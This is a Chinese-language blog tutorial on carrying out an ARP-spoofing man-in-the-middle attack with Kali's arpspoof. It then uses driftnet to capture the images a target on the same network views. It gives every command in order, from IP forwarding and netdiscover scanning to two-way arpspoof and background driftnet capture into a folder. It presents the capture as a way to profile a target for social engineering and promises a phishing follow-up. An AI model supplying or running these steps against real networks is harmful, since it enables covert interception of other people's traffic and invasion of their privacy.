Arpspoof中间人攻击盗取浏览图片

这次我们玩Arpspoof的MITM(Man in the Middle)攻击可以看得到目标浏览过的图片而且是Kali系统默认的软件.
你可以使用#arpspoof 查看你有没有这个软件.

如果没有就需要自行安装了
#sudo apt-get install arpspoof && apt-get install dsniff && apt-get install drifnet

1.开始教程打开Terminal设定转发你按Enter是没反应是正常现象.
#echo 1 > /proc/sys/net/ipv4/ip_forward

2.扫描你的网络找到你的目标192.168.1.54 (也是就是我的电脑win10大大)
#sudo netdiscover

3.改变他的流量让你变成中间人, 你需要开两个Terminal不能关闭. (不能关闭

第一个Terminal (不能关闭
#arpspoof -i [你的网络,我是无线网所以是wlan0] -t [目标IP] [gateway IP通常是192.168.1.1]

第二个Terminal (不能关闭
把目标IP和gateway对调就可以了
#arpspoof -i [你的网络] -t [gateway IP] [目标IP]

现在你就在你的目标机和路由器中间了大概是这样的概念.
目标要经过你才能上网所以你可以做任何事比如:捉包, 钓鱼 之类的, 那这次我们是用来截取图片

4.打开一个新的Teminal输入指令你会看到跳了一个driftnet
当你的目标浏览某些没被保护的图片都会在这里显示出来

#driftnet -i [你的网络]

5.我们在我们的目标机打开浏览器随便浏览

6.我们kali这里driftnet就会出现某下目标浏览过的图片然后你点击该图片就会下载到你的home文件夹.

7.这是driftnet的使用方法

语法 driftnet   [options]   [filter code]
主要参数:
 -b               捕获到新的图片时发出嘟嘟声
-i  interface     选择监听接口
-f  file   读取一个指定pcap数据包中的图片
-p  不让所监听的接口使用混杂模式
-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory  指定保存图片的路径
-x prefix  指定保存图片的前缀名

通常我会让他后台跑然后把图片全部下载到一个文件夹等到我结束中间人再慢慢浏览.










#driftnet -i wlan0 -m 1000 -a -d [文件夹位置]


8.你只需要关掉Terminal就可以结束全部进程了.

总结
-这对计算机还是有点压力尤其是使用虚拟机有可以出现卡死或和目标断开.
-对社会工程学是非常需要的因为它可以让你了解你目标的信息比如:他喜欢浏览什么, 他的兴趣并让你能顺利的和目标接触.
-之后我们来网页钓鱼.











感谢阅读

No comments:

Post a Comment